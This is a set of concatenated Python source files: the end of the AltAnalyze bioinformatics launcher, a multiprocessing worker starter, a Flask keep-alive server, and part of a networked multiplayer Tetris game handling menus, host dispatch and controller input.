    graphic_links.append(['PCA2','PCA.png'])
    graphic_links.append(['HC2','HC.png'])
    graphic_links.append(['PCA3','PCA.png'])
    graphic_links.append(['HC3','HC.png'])
    graphic_links.append(['PCA4','PCA.png'])
    graphic_links.append(['HC4','HC.png'])
    summary_db={}
    summary_db['QC'] = graphic_links
    #summary_db={}
    fl.setGraphicLinks(graphic_links)
    # Dummy counts for every statistic the summary window displays.
    # (The repeated alt_events/denominator assignments below are redundant.)
    summary_db['gene_assayed'] = 1
    summary_db['denominator_exp_genes'] = 1
    summary_db['alt_events'] = 1
    summary_db['denominator_exp_events'] = 1
    summary_db['alt_events'] = 1
    summary_db['denominator_exp_events'] = 1
    summary_db['alt_events'] = 1
    summary_db['denominator_exp_events'] = 1
    summary_db['alt_genes'] = 1
    summary_db['direct_domain_genes'] = 1
    summary_db['miRNA_gene_hits'] = 1
    #summary_db={}
    print_out = 'Analysis complete. AltAnalyze results\nexported to "AltResults/AlternativeOutput".'
    dataset = 'test'; results_dir=''
    print "Analysis Complete\n";
    if root !='' and root !=None:
        UI.InfoWindow(print_out,'Analysis Completed!')
        tl = Toplevel(); SummaryResultsWindow(tl,'GE',results_dir,dataset,'parent',summary_db)
    #sys.exit()
class Logger(object):
    """File-teeing stdout replacement.

    Echoes every message to the real ``sys.stdout`` and also appends it to
    the file named by the global ``log_file``.  The file is re-opened in
    append mode and closed on every ``write`` so the on-disk log remains
    complete even if the process dies abruptly.
    """
    def __init__(self,null):
        # ``null`` is unused; retained so existing Logger('') calls still work.
        self.terminal = sys.stdout
        # Truncate any previous log, then close the handle immediately.
        # (The original kept this initial "w" handle open, leaking a file
        # descriptor that was only released when write() rebound self.log.)
        self.log = open(log_file, "w")
        self.log.close()
    def write(self, message):
        # Echo to the real console first, then persist to the log file.
        self.terminal.write(message)
        self.log = open(log_file, "a")
        self.log.write(message)
        self.log.close()
    def flush(self):
        # No-op: each write is already flushed by the close() above.
        pass
class SysLogger(object):
    """File-teeing stdout replacement for the system report log.

    Identical in behavior to ``Logger`` but writes to the global
    ``sys_log_file`` path instead of ``log_file``.
    """
    def __init__(self,null):
        # ``null`` is unused; retained so existing SysLogger('') calls work.
        self.terminal = sys.stdout
        # Truncate any previous report, then close the handle immediately.
        # (The original left this initial "w" handle open -- a leak.)
        self.log = open(sys_log_file, "w")
        self.log.close()
    def write(self, message):
        # Echo to the real console first, then persist to the report file.
        self.terminal.write(message)
        self.log = open(sys_log_file, "a")
        self.log.write(message)
        self.log.close()
    def flush(self):
        # No-op: each write is already flushed by the close() above.
        pass
def verifyPath(filename):
    """Resolve *filename* against the current working directory.

    If the name exists under the CWD (as a listed entry, a regular file,
    or a readable directory), return the CWD-prefixed path; otherwise
    return the input unchanged.  All probing errors are deliberately
    swallowed so this never raises.
    """
    resolved = filename
    working_dir = os.getcwd()
    candidate = working_dir + '/' + filename
    # First probe: is the name listed in the CWD's directory contents?
    try:
        if filename in unique.read_directory(working_dir):
            resolved = candidate
    except Exception:
        pass
    # Second probe: regular file, or (for local AltAnalyze directories)
    # a directory that can be listed.
    try:
        if os.path.isfile(candidate):
            resolved = candidate
        else:
            unique.read_directory(candidate)  # raises if not a directory
            resolved = candidate
    except Exception:
        #print traceback.format_exc()
        pass
    return resolved
def dependencyCheck():
    ### Make sure core dependencies for AltAnalyze are met and if not report back
    # Reports the functional impact of each missing module instead of failing.
    # NOTE(review): iter_modules lists top-level modules only, so submodule
    # names like 'ImageTk' may never appear even when installed -- confirm.
    from pkgutil import iter_modules
    modules = set(x[1] for x in iter_modules()) ### all installed modules
    dependent_modules = ['string','csv','base64','getpass','requests']
    dependent_modules += ['warnings','sklearn','os','webbrowser']
    dependent_modules += ['scipy','numpy','matplotlib','igraph','pandas','patsy']
    dependent_modules += ['ImageTk','PIL','cairo','wx','fastcluster','pysam', 'Tkinter']
    dependent_modules += ['networkx','numba','umap','nimfa','lxml','annoy','llvmlite']
    print ''
    count=0
    for module in dependent_modules:
        if module not in modules:
            # Image modules get a softer message in the dedicated branch below.
            if 'ImageTk' != module and 'PIL' != module:
                print 'AltAnalyze depedency not met for:',module
            if 'fastcluster' == module:
                print '...Faster hierarchical cluster not supported without fastcluster'
            if 'pysam' == module:
                print '...BAM file access not supported without pysam'
            if 'scipy' == module:
                print '...Many required statistical routines not supported without scipy'
            if 'numpy' == module:
                print '...Many required statistical routines not supported without numpy'
            if 'matplotlib' == module:
                print '...Core graphical outputs not supported without matplotlib'
            if 'requests' == module:
                print '...Wikipathways visualization not supported without requests'
            if 'lxml' == module:
                print '...Wikipathways visualization not supported without lxml'
            if 'wx' == module:
                print '...The AltAnalyze Results Viewer requires wx'
            if 'ImageTk' == module or 'PIL' == module:
                # NOTE(review): 'PIL' is always in dependent_modules, so this
                # inner print is dead code -- confirm intended condition.
                if 'PIL' not in dependent_modules:
                    print 'AltAnalyze depedency not met for:',module
                print '...Some graphical results displays require ImageTk and PIL'
            if 'Tkinter' == module:
                print '...AltAnalyze graphical user interface mode requires Tkinter'
            if 'igraph' == module or 'cairo' == module:
                print '...Network visualization requires igraph and cairo'
            if 'sklearn' == module:
                print '...t-SNE analysis requires sklearn'
            if 'pandas' == module or 'patsy' == module:
                print '...Combat batch effects correction requires pandas and patsy'
            count+=1
    # NOTE(review): a single missing dependency (count == 1) does not trigger
    # this warning -- confirm whether 'count>0' was intended.
    if count>1:
        print '\nWARNING!!!! Some dependencies are not currently met.'
        print "This may impact AltAnalyze's performance\n"
def unpackConfigFiles():
    """ When pypi installs AltAnalyze in site-packages, a zip file for the Config
    and AltDatabase in the pypi installed AltAnalyze library directory. To allow
    for different flexible database versions to be written, AltDatabase and Config
    are written to the user home directory in the folder 'altanalyze'."""
    fn = filepath('Config/options.txt') ### See if a Config folder is already available
    fileExists = os.path.isfile(fn)
    if fileExists == False:
        # First run from a pip install: extract the bundled zips into ~/altanalyze.
        import subprocess  # NOTE(review): subprocess, shutil and site are imported but unused here
        import shutil
        import site
        import zipfile
        from os.path import expanduser
        userdir = expanduser("~")
        try:
            os.mkdir(userdir+"/altanalyze")
        except:
            # Directory already exists (or cannot be created) -- proceed anyway.
            pass
        # AltDatabase.zip is expected alongside Config.zip in the install dir.
        config_filepath = filepath("Config.zip")
        altdatabase_filepath = string.replace(config_filepath,'Config.zip','AltDatabase.zip')
        print '...Creating Config directory in:',userdir+"/altanalyze",
        with zipfile.ZipFile(config_filepath,"r") as zip_ref:
            zip_ref.extractall(userdir+"/altanalyze")
        with zipfile.ZipFile(altdatabase_filepath,"r") as zip_ref:
            zip_ref.extractall(userdir+"/altanalyze")
        print '...written'
def systemLog():
    """Redirect stdout to a SysLogger recording into Config/report.log."""
    global sys_log_file
    sys_log_file = filepath('Config/report.log')
    # Truncate any previous report before installing the logger.
    open(sys_log_file,'w').close()
    sys.stdout = SysLogger('')
def versionCheck():
    # Hard-stop on macOS 10.14.6: this exact OS release has a known fatal
    # incompatibility, so open the explanation page and exit.
    # (The typo 'AltAanlyze' exists in the original runtime string and is
    # deliberately left untouched here.)
    import platform
    if platform.system()=='Darwin':
        if platform.mac_ver()[0] == '10.14.6':
            print 'CRITICAL ERROR. AltAanlyze has a critical incompatibility with this specific OS version.'
            url = 'http://www.altanalyze.org/MacOS-critical-error.html'
            try: webbrowser.open(url)
            except Exception: pass
            sys.exit()
if __name__ == '__main__':
    # freeze_support() is needed for frozen/multiprocessing Windows builds;
    # harmless elsewhere, so failures are ignored.
    try: mlp.freeze_support()
    except Exception: pass
    systemLog()
    sys_log_file = filepath('Config/report.log')
    print 'Using the Config location:',sys_log_file
    versionCheck()
    try: unpackConfigFiles()
    except: pass
    #testResultsPanel()
    skip_intro = 'yes'; #sys.exit()
    #skip_intro = 'remoteViewer'
    dependencyCheck()
    try:
        # Command-line mode runs first; the GUI follows only if Tkinter
        # imported successfully at module load.
        runCommandLineVersion()
        if use_Tkinter == 'yes':
            AltAnalyzeSetup(skip_intro)
    except:
        # Suppress tracebacks produced by deliberate sys.exit() calls.
        if 'SystemExit' not in traceback.format_exc():
            print traceback.format_exc()
""" To do list:
3) SQLite for gene-set databases prior to clustering and network visualization
7) (partially) Integrate splicing factor enrichment analysis (separate module?)
17) Support R check (and response that they need it) along with GUI gcrma, agilent array, hopach, combat
19) Update the software from the software
Advantages of this tool kit:
0) Easiest to use, hands down
1) Established and novel functionality for transcriptome/proteomics analysis built in
2) Independent and cooperative options for RNA-Seq and array analysis (splicing and gene expression)
3) Superior functional analyses (TF-target, splicing-factor target, lineage markers, WikiPathway visualization)
4) Options for different levels of users with different integration options (multiple statistical method options, option R support)
5) Built in secondary analysis options for already processed data (graphing, clustering, biomarker discovery, pathway analysis, network visualization)
6) Incorporates highly validated alternative exon identification methods, independent and jointly
Primary Engineer Work:
0) C-library calls and/or multithreading where applicable to improve peformance.
1) MySQL or equivalent transition for all large database queries (e.g., HuEx 2.1 on-the-fly coordinate mapping).
3) Isoform-domain network visualization and WP overlays.
4) Webservice calls to in silico protein translation, domain prediction, splicing factor regulation.
"""
|
run.py | import settings
import sys
try:
sys.path.extend(settings.libs)
except AttributeError:
pass
from multiprocessing import Process
if __name__ == '__main__':
    from worker import ImgprocWorker
    # Spawn settings.workers processes in total: (workers - 1) children plus
    # this parent process, which becomes the final worker below.
    # NOTE: xrange makes this Python 2-only code.
    for i in xrange(settings.workers - 1):
        p = Process(target=ImgprocWorker)
        p.start()
    # Parent runs the last worker inline (blocking call).
    ImgprocWorker()
|
keepalive.py | from flask import Flask
from threading import Thread
app = Flask('')
@app.route('/')
def home():
    # Root route: returns a fixed liveness message.
    return "Hello. I am alive!"
def run():
    # Blocking call: serve the Flask app on all interfaces, port 8080.
    app.run(host='0.0.0.0',port=8080)
def keepalive():
    """Start the web server on a background thread and return immediately."""
    server_thread = Thread(target=run)
    server_thread.start()
|
masstris.py | import pygame
import threading
import multiprocessing
import time
import sys
import random
import os
import glob
from collections import deque
import graphics
import player_game
import display_game
import networking
import ai
class Screen:
    """
    Base class for all game screens.

    Exposes the per-frame hooks the main loop invokes; subclasses override
    whichever hooks they need.  ``self.next`` names the screen to run on the
    next frame (itself, until switch_to() is called).
    """
    def __init__(self):
        global display
        self.next = self
        self.is_connected = False
    def switch_to(self, next_screen):
        """Schedule *next_screen* to take over on the next frame."""
        self.next = next_screen
    def process_events(self):
        """Hook: react to network/timed events (no-op by default)."""
        pass
    def process_input(self):
        """Hook: consume user input (no-op by default)."""
    def update_display(self):
        """Hook: draw this screen (no-op by default)."""
        pass
    def receive(self):
        """Hook: read incoming network data (no-op by default)."""
        pass
    def send(self):
        """Hook: push outgoing network data (no-op by default)."""
        pass
    def process_AI(self):
        # Hook: advance AI-controlled games (no-op by default).
        pass
class MainScreen(Screen):
    """
    Main screen for game selection
    """
    # Menu entries are bound once at class-definition time.
    from data import menu_items
    def __init__(self):
        super().__init__()
        global network
        self.host_data = {}
        self.selection = 0  # index of the highlighted menu item
        self.next = self
        self.status_update_time = None
        # Music
        global music
        if music:
            play_next_song(menu=True)
    def process_events(self):
        """
        Update broadcast data based on current settings
        """
        global local_players_count
        global max_games
        global run_AI
        # Data advertised to other hosts on the network each frame.
        network.my_data = {'status': network.task,
                           'host': network.host_name,
                           'players': local_players_count,
                           'max': max_games,
                           'AI': run_AI}
    def process_input(self):
        """
        Process all relevant pygame events and update game state
        """
        global run_AI
        for event in pygame.event.get():
            if event.type == pygame.QUIT:
                quit_game()
            elif event.type == pygame.KEYDOWN:
                try:
                    # Unmapped keys raise KeyError and fall through to pass.
                    action = menu_keys[pygame.key.name(event.key)]
                    if action == 'quit':
                        quit_game()
                    elif action == 'move_right':
                        self.move_right()
                    elif action == 'move_left':
                        self.move_left()
                    elif action == 'move_up':
                        self.move_up()
                    elif action == 'move_down':
                        self.move_down()
                    elif action == 'validate':
                        self.validate()
                    elif action == 'ai toggle':
                        # Redundant: run_AI is already declared global above.
                        global run_AI
                        run_AI = not run_AI
                except:
                    pass
            elif event.type == pygame.JOYHATMOTION:
                # Hat x-axis adjusts player count; y-axis moves the menu cursor.
                if event.value[0] == -1:
                    self.move_left()
                elif event.value[0] == 1:
                    self.move_right()
                elif event.value[1] == 1:
                    self.move_up()
                elif event.value[1] == -1:
                    self.move_down()
            elif event.type == pygame.JOYBUTTONDOWN:
                if event.button == 0:
                    self.validate()
                if event.button == 3:
                    run_AI = not run_AI
    def update_display(self):
        """
        Call graphics routine
        """
        global run_AI
        display.main_screen(self.selection, local_players_count, run_AI)
    def move_up(self):
        # Move menu highlight up, clamped at the first entry.
        if self.selection > 0:
            self.selection -= 1
    def move_down(self):
        # Move menu highlight down, clamped at the last entry.
        if self.selection < len(self.menu_items) - 1:
            self.selection += 1
    def move_right(self):
        # Raise the local player count, clamped at max_actives.
        global local_players_count
        if local_players_count < max_actives:
            local_players_count += 1
    def move_left(self):
        # Lower the local player count, clamped at one.
        global local_players_count
        if local_players_count > 1:
            local_players_count -= 1
    def validate(self):
        # Selection 2 quits; 1 starts a network game; anything else local only.
        if self.selection == 2:
            quit_game()
        elif self.selection == 1:
            is_connected = True
        else:
            is_connected = False
        # force update our status before moving on
        self.process_events()
        self.next = LoadScreen(is_connected)
class LoadScreen(Screen):
"""
Object controlling the networking aspect:
Simple passthrough for local only, controlled by main loop for network game
"""
from data import time_to_expire
def __init__(self, is_connected=False):
"""
Prepare needed variables
Call for start of game screen if local only
"""
super().__init__()
global display
global network
self.is_connected = is_connected
if not is_connected:
# start solo game
network.task = 'scan'
game_data = self.dispatcher()
self.next = GameScreen(game_data, is_master=True, is_connected=False)
self.game_started = False
def process_input(self):
"""
Check pygame events for starting a game
"""
for event in pygame.event.get():
if event.type == pygame.QUIT:
quit_game()
if event.type == pygame.KEYDOWN:
try:
action = menu_keys[pygame.key.name(event.key)]
if action == 'quit':
network.task = 'reset'
self.next = MainScreen()
else:
network.my_data['status'] = 'start'
except:
pass
def process_events(self):
"""
Check if a game has been initiated by a host and manage synchronization
"""
def find_main_host():
"""
Return key for best host for AI, dispatch and other centralized gameplay functions
Deterministic
"""
host_data = network.host_data
best_pick = None
for IP in host_data:
# set best_pick to first element if None
if best_pick is None:
best_pick = IP
# for all the hosts that can run AI
if host_data[IP]['AI'] is True:
# pick highest max
if host_data[IP]['max'] > host_data[best_pick]['max']:
best_pick = IP
# if equal pick max host
if host_data[IP]['max'] == host_data[best_pick]['max']:
if max(host_data[IP]['host'], host_data[best_pick]['host']) == host_data[IP]['host']:
best_pick = IP
return best_pick
def decode_game_data(encoded_data=''):
"""
Decode remote game data and return it
In the form:
'host1%start_range%end_range&host2%start_range%end_range...'
"""
decoded_data = {}
try:
hosts = encoded_data.split('&')
for host in hosts:
items = host.split('%')
decoded_data[items[0]] = {'start_range': int(items[1]), 'end_range': int(items[2])}
except (KeyError, IndexError):
pass
return decoded_data
if self.game_ready():
# check whether this host is the master
master_IP = find_main_host()
is_master = bool(master_IP == network.my_IP)
if is_master:
# set up game data
network.game_data = self.dispatcher(True)
# sync up other games
network.task = 'sync_master'
# Delay to give clients a headstart
time.sleep(1)
else:
# sync with master
network.task = 'sync'
time_out = time.process_time()
while time.process_time() - time_out < self.time_to_expire:
ready = True
for ready_item in network.sync_status:
if not ready_item:
ready = False
if ready:
decoded_data = decode_game_data(network.game_data)
# Make certain this host is in game and join
if network.my_IP in decoded_data:
self.next = GameScreen(decoded_data, is_master, self.is_connected)
network.task = 'game'
return
else:
# Reset scan results
for IP in network.host_data:
network.host_data[IP]['status'] = ''
# If something failed
network.task = 'reset'
self.next = MainScreen()
def game_ready(self):
    """
    Return True if any host in the scan data has announced a started game.
    """
    return any(
        network.host_data[IP]['status'] == 'start'
        for IP in network.host_data
    )
def dispatcher(self, encode=False):
    """
    Assign every host a contiguous range of game IDs based on its
    advertised player count, then reserve the remaining IDs for AI.

    Parameters:
        encode: when True, return the network string form instead of the
            dict (see encode_game_data).

    Returns the game data dict {host: {'start_range', 'end_range'}, ...,
    'AI': {...}} or its encoded string when encode is True.
    """
    def encode_game_data(data):
        """
        Encode game data into a string for network transmission:
        hosts separated by '&', fields within a host separated by '%'.
        """
        return '&'.join(
            '%s%%%s%%%s' % (host, data[host]['start_range'], data[host]['end_range'])
            for host in data
        )
    game_data = {}
    game_ID = 0
    # Local games always occupy the first IDs
    game_data[network.my_IP] = {'start_range': game_ID}
    game_ID += local_players_count
    game_data[network.my_IP]['end_range'] = game_ID - 1
    if self.is_connected:
        # Multiplayer: hand out ranges to the other hosts in scan order
        for IP in network.host_data:
            if IP == network.my_IP:
                continue
            players = network.host_data[IP]['players']
            if players + game_ID <= max_games:
                game_data[IP] = {
                    'start_range': game_ID,
                    'end_range': game_ID + players - 1,
                }
                game_ID += players
            else:
                # Out of capacity: stop assigning. Bug fix: the original
                # recorded a partial entry here (start_range without
                # end_range), which made encode/decode crash later.
                break
    # Whatever is left (up to max_games) is available to AI
    game_data['AI'] = {'start_range': game_ID}
    if run_AI:
        # As many as allowed
        game_data['AI']['end_range'] = max_games - 1
    else:
        # None (end == start; downstream range math treats this as empty)
        game_data['AI']['end_range'] = game_ID
    if encode:
        return encode_game_data(game_data)
    return game_data
def update_display(self):
    """
    Refresh the host-scan screen; nothing is drawn while offline.
    """
    if not self.is_connected:
        return
    display.load_screen(network.host_data)
class TitleScreen(Screen):
    """
    Splash screen shown before the main menu.
    """

    def __init__(self):
        super().__init__()
        display.set_up_title()

    def process_input(self):
        """
        Advance to the main menu on any key or gamepad button press.
        """
        triggers = (pygame.KEYDOWN, pygame.JOYBUTTONDOWN)
        for event in pygame.event.get():
            if event.type in triggers:
                self.next = MainScreen()

    def update_display(self):
        """
        Draw the title scene.
        """
        display.title_screen()
class GameScreen(Screen):
"""
Where the magic happens!
Object controlling the set up and organization of a Tetris game, meant to be called from main loop
"""
from data import side_moves_per_second
def __init__(self, game_data=None, is_master=False, is_connected=False):
    """
    Prepare required variables, set up the data structures for the games
    and set up graphics for all games.

    Parameters:
        game_data: dict mapping host IP (and 'AI') to
            {'start_range', 'end_range'} game-ID bounds.
        is_master: whether this host runs AI/dispatch duties.
        is_connected: whether this is a networked game.
    """
    super().__init__()
    global display
    global network
    self.is_connected = is_connected
    self.is_master = is_master
    self.pause_triggered = False
    self.winner = None
    # Boards changed this frame, consumed by update_display
    self.updated_boards = deque()
    # AI drop-timer bookkeeping: game_ID -> timestamp of last completed move
    self.ready_games = {}
    self.lost_range = []
    # Something went wrong...
    # NOTE(review): this guard looks ineffective — execution continues into
    # new_game_setup below, which will fail on game_data=None. Confirm that
    # callers never actually pass None.
    if game_data is None:
        self.next = MainScreen()
    # Prep the games
    self.games, self.active_games, self.AI_games, self.remote_games = self.new_game_setup(game_data)
    # Prep the graphic engine
    global backgrounds
    if backgrounds is not None:
        # Use the current head of the list, then reshuffle for next time
        background = backgrounds[0]
        random.shuffle(backgrounds)
    else:
        background = None
    display.set_up(len(self.games), self.active_range, self.remote_range, background=background)
    # Music
    global music
    if music:
        play_next_song()
def new_game_setup(self, game_data=None):
    """
    Necessary tasks to organize a new game.
    Calculate shifts so local games are always displayed from top left.
    Populate the AI, remote, active and display game lists that will be
    iterated with newly created games.

    game_data maps host IP (and 'AI') to {'start_range', 'end_range'}
    game-ID bounds. Returns (games, active_games, AI_games, remote_games):
    parallel lists indexed by display position, with None at positions not
    belonging to that category.
    """
    if game_data is None:
        game_data = {}
    # How much local games are shifted
    # NOTE(review): with an empty game_data the lookup below raises
    # KeyError — callers appear to always supply real data; confirm.
    self.my_offset = game_data[network.my_IP]['start_range']
    # games actually played on local machine (shifted to start at 0)
    self.active_range = list(range(game_data[network.my_IP]['start_range'] - self.my_offset, game_data[network.my_IP]['end_range'] - self.my_offset + 1))
    if self.is_master:
        # remote games from end of active range to beginning of AI range
        self.remote_offset = 0
        if self.is_connected:
            self.remote_range = list(range(game_data[network.my_IP]['end_range'] + 1, game_data['AI']['start_range']))
        else:
            self.remote_range = []
        global run_AI
        if run_AI:
            self.AI_range = list(range(game_data['AI']['start_range'], game_data['AI']['end_range'] + 1))
        else:
            self.AI_range = []
    else:
        # To allow local games to always be first displayed
        self.remote_offset = game_data[network.my_IP]['end_range'] - game_data[network.my_IP]['start_range'] + 1
        # Remote = before active range, and between active range and AI
        self.remote_range = []
        for game in range(0 + self.remote_offset, game_data[network.my_IP]['end_range'] + 1):
            self.remote_range.append(game)
        for game in range(game_data[network.my_IP]['end_range'] + 1, game_data['AI']['end_range'] + 1):
            self.remote_range.append(game)
        # AI range null: non-masters never run AI games
        self.AI_range = []
    # Prepare the data structures: one slot per display position
    active_games = []
    AI_games = []
    remote_games = []
    games = []
    for _ in range(len(self.active_range) + len(self.remote_range) + len(self.AI_range)):
        active_games.append(None)
        AI_games.append(None)
        remote_games.append(None)
        games.append(None)
    global ghost
    now = time.process_time()
    for index in range(len(games)):
        # Populate actively played games
        if index in self.active_range:
            new_local_game = player_game.ActiveBoard(ghost)
            new_display_game = display_game.Board(ghost)
            active_games[index] = new_local_game
            games[index] = new_display_game
        # Populate remote games (display-only boards fed by the network)
        elif index in self.remote_range and self.is_connected:
            new_display_game = display_game.Board(ghost=False)
            remote_games[index] = new_display_game
            games[index] = new_display_game
        # Populate AI games
        elif index in self.AI_range and self.is_master and run_AI:
            new_AI_game = player_game.ActiveBoard(ghost=False)
            new_display_game = display_game.Board(ghost=False)
            AI_games[index] = new_AI_game
            games[index] = new_display_game
            # Delay first move to avoid early performance bottlenecks
            self.ready_games[index] = now + random.randint(100, 300) / 200
        else:
            pass
    # Network game started with no other hosts
    if self.remote_range == []:
        self.is_connected = False
    # For continuous lateral movement (key/hat held down)
    self.lateral_timers = {}
    return games, active_games, AI_games, remote_games
def update_display(self):
    """
    Redraw only the boards flagged as changed this frame, then reset
    the tracker.
    """
    if not self.updated_boards:
        return
    display.draw(self.games, self.updated_boards, self.winner)
    self.updated_boards.clear()
def process_input(self):
    """
    Process gameplay input.
    Iterate through each input event to apply appropriate gameplay action.
    Keyboard: each key is linked to a specific game.
    Gamepads/Joysticks: each is linked to a specific game.
    Return whether gameplay is paused.
    """
    # Process all pygame events
    now = time.process_time()
    for event in pygame.event.get():
        global players_with_sound
        if event.type == pygame.QUIT:
            quit_game()
        elif event.type == SONG_END:
            play_next_song()
        # Keyboard button pressed
        elif event.type == pygame.KEYDOWN:
            try:
                # game_keys maps key name -> (game index, action string)
                game_ID, action = game_keys[pygame.key.name(event.key)]
                if action == 'quit':
                    self.next = MainScreen()
                if self.active_games[game_ID] is not None:
                    # Pause is only available to a non-networked master
                    if action == 'pause' and self.is_master and not self.is_connected:
                        self.pause_triggered = not self.pause_triggered
                    elif self.pause_triggered:
                        # While paused, ignore all other gameplay actions
                        return self.pause_triggered
                    elif action == 'move right':
                        if game_ID < players_with_sound:
                            play_sound_effect('move')
                        # Remember direction/time for key-held auto-repeat
                        self.lateral_timers[game_ID] = ('right', now)
                        self.active_games[game_ID].move_right()
                    elif action == 'move left':
                        if game_ID < players_with_sound:
                            play_sound_effect('move')
                        self.lateral_timers[game_ID] = ('left', now)
                        self.active_games[game_ID].move_left()
                    elif action == 'turn counter-clockwise':
                        if game_ID < players_with_sound:
                            play_sound_effect('turn')
                        self.active_games[game_ID].turn_counter_clockwise()
                    elif action == 'turn clockwise':
                        if game_ID < players_with_sound:
                            play_sound_effect('turn')
                        self.active_games[game_ID].turn_clockwise()
                    elif action == 'speed up':
                        self.active_games[game_ID].speed_up(True)
                    elif action == 'hard drop':
                        if game_ID < players_with_sound:
                            play_sound_effect('drop')
                        self.active_games[game_ID].drop()
                    elif action == 'hold':
                        if game_ID < players_with_sound:
                            play_sound_effect('store')
                        self.active_games[game_ID].store_piece()
                    elif action == 'light up':
                        self.games[game_ID].light_speed_flag = True
                        self.updated_boards.append(game_ID)
            except:
                # Unmapped key or game not hosted locally — ignore
                pass
        # Keyboard key released
        elif event.type == pygame.KEYUP:
            try:
                game_ID, action = game_keys[pygame.key.name(event.key)]
                if self.active_games[game_ID] != None:
                    if action == 'light up':
                        self.games[game_ID].light_speed_flag = False
                        self.updated_boards.append(game_ID)
                    elif action == 'speed up':
                        self.active_games[game_ID].speed_up(False)
                    elif action == 'move left':
                        # Stop auto-repeat for this game
                        del self.lateral_timers[game_ID]
                    elif action == 'move right':
                        del self.lateral_timers[game_ID]
            except:
                # Unmapped key or no repeat timer active — ignore
                pass
        # Gamepad Hat movement
        elif event.type == pygame.JOYHATMOTION:
            try:
                game_ID = joysticks[event.joy]
                if event.value[0] == -1:
                    if game_ID < players_with_sound:
                        play_sound_effect('move')
                    self.active_games[game_ID].move_left()
                    self.lateral_timers[game_ID] = ('left', now)
                elif event.value[0] == 1:
                    if game_ID < players_with_sound:
                        play_sound_effect('move')
                    self.active_games[game_ID].move_right()
                    self.lateral_timers[game_ID] = ('right', now)
                elif event.value[0] == 0:
                    # Hat released horizontally: stop auto-repeat
                    del self.lateral_timers[game_ID]
                elif event.value[1] == 1:  # HAT up
                    if game_ID < players_with_sound:
                        play_sound_effect('drop')
                    self.active_games[game_ID].drop()
                elif event.value[1] == -1:  # HAT down
                    if game_ID < players_with_sound:
                        play_sound_effect('drop')
                    self.active_games[game_ID].drop()
            except:
                # Unmapped joystick, lost game or no timer active — ignore
                pass
        # Gamepad button pressed
        elif event.type == pygame.JOYBUTTONDOWN:
            game_ID = joysticks[event.joy]
            if event.button == 0:
                if game_ID < players_with_sound:
                    play_sound_effect('drop')
                self.active_games[game_ID].drop()
            elif event.button == 2:
                if game_ID < players_with_sound:
                    play_sound_effect('turn')
                self.active_games[game_ID].turn_counter_clockwise()
            elif event.button == 1:
                if game_ID < players_with_sound:
                    play_sound_effect('turn')
                self.active_games[game_ID].turn_clockwise()
            elif event.button == 3:
                if game_ID < players_with_sound:
                    play_sound_effect('store')
                self.active_games[game_ID].store_piece()
            elif event.button == 5:
                self.active_games[game_ID].speed_up(True)
            elif event.button == 4:
                self.games[game_ID].light_speed_flag = True
                self.updated_boards.append(game_ID)
        # Gamepad button released
        elif event.type == pygame.JOYBUTTONUP:
            game_ID = joysticks[event.joy]
            if event.button == 4:
                self.games[game_ID].light_speed_flag = False
                self.updated_boards.append(game_ID)
            elif event.button == 5:
                self.active_games[game_ID].speed_up(False)
    # Track which games are still attempting button held down type moves
    # and check if they are ready to act again
    for game in self.lateral_timers:
        if self.lateral_timers[game][0] == 'left' and now - self.lateral_timers[game][1] > 1 / self.side_moves_per_second:
            if game < players_with_sound:
                play_sound_effect('move')
            self.active_games[game].move_left()
            self.lateral_timers[game] = ('left', now)
        elif self.lateral_timers[game][0] == 'right' and now - self.lateral_timers[game][1] > 1 / self.side_moves_per_second:
            if game < players_with_sound:
                play_sound_effect('move')
            self.active_games[game].move_right()
            self.lateral_timers[game] = ('right', now)
    return self.pause_triggered
def process_events(self):
    """
    Process all the various events of this frame:
    -All reports for each game
    -Perform end of tick maintenance
    -End if winning condition
    """
    def process_reports(reports, game_ID, broadcast):
        """
        Loop through all reports in the queue for a given game.
        Manage data as needed for each (update display, score...).
        Broadcast update if needed (remote games).
        Clear report queue on exit.
        Return True if game is still ongoing, False if it lost.
        """
        def encode_board(report):
            """
            Encode board data report for network transmission.
            Board report in the form of (game_ID, board_data).
            Result is a string where each line is separated by ':'.
            Return report as (game_ID, encoded_board)
            """
            # Create a string from each element in a row, for each row
            encoded = ''
            for row in range(len(self.games[game_ID].board)):
                for col in range(len(self.games[game_ID].board[0])):
                    encoded = encoded + str(self.games[game_ID].board[row][col])
                # Omit ':' for last row
                if row != len(self.games[game_ID].board) - 1:
                    encoded = encoded + ':'
            return report[0], encoded
        # For graphic performance: track whether this game has changed this frame
        self.updated_boards.append(game_ID)
        # Loop through reports
        for report in reports:
            if report[0] == 'loss':
                if len(self.games) > 1:
                    self.games[game_ID].score = -1
                else:
                    self.winner = 0
                return False
            elif report[0] == 'winner':
                self.winner = report[1]
            elif report[0] == 'move':
                # Update piece position
                self.games[game_ID].piece_row = report[1]
                self.games[game_ID].piece_col = report[2] - 3
            elif report[0] == 'hold':
                # Update hold piece
                self.games[game_ID].hold_piece = report[1]
            elif report[0] == 'shape':
                # Update piece shape
                self.games[game_ID].piece = report[1]
            elif report[0] == 'piece':
                # Update piece and location
                self.games[game_ID].piece = report[1]
                self.games[game_ID].piece_row = report[2]
                self.games[game_ID].piece_col = report[3] - 3
            elif report[0] == 'board':
                # Update game board
                self.games[game_ID].board = report[1]
            elif report[0] == 'queue':
                # Update the piece queue
                self.games[game_ID].pieces = []
                for piece in report[1]:
                    self.games[game_ID].pieces.append(piece)
            elif report[0] == 'clear':
                bad_lines = report[1] // 2
                # Select and notify victim if master
                if self.is_master and bad_lines > 0 and len(self.games) > 1:
                    victims = set().union(self.AI_range, self.remote_range, self.active_range)
                    victims.discard(game_ID)
                    # Bug fix: random.sample() on a set is a TypeError on
                    # Python 3.11+; choice over a tuple is equivalent here.
                    victim = random.choice(tuple(victims))
                    if victim in self.AI_range:
                        self.AI_games[victim].bonus_lines = bad_lines
                    elif victim in self.active_range:
                        self.active_games[victim].bonus_lines = bad_lines
                    elif broadcast:
                        network.send_update(victim, ('bonus', bad_lines))
                # Update score
                self.games[game_ID].score = report[2]
            elif report[0] == 'bonus':
                # Update game receiving bonus lines.
                # Bug fix: the original added bonus_lines on the *lists*
                # (self.AI_games / self.active_games) instead of the board
                # at game_ID, and tested membership against the board
                # objects rather than the ID range.
                if game_ID in self.AI_range:
                    self.AI_games[game_ID].bonus_lines += report[1]
                elif game_ID in self.active_range:
                    self.active_games[game_ID].bonus_lines += report[1]
            if broadcast:
                # pack up board data for size
                if report[0] == 'board':
                    report = encode_board(report)
                # Check for shifted games
                if game_ID < self.remote_offset:
                    network.send_update(game_ID + self.my_offset, report)
                else:
                    network.send_update(game_ID, report)
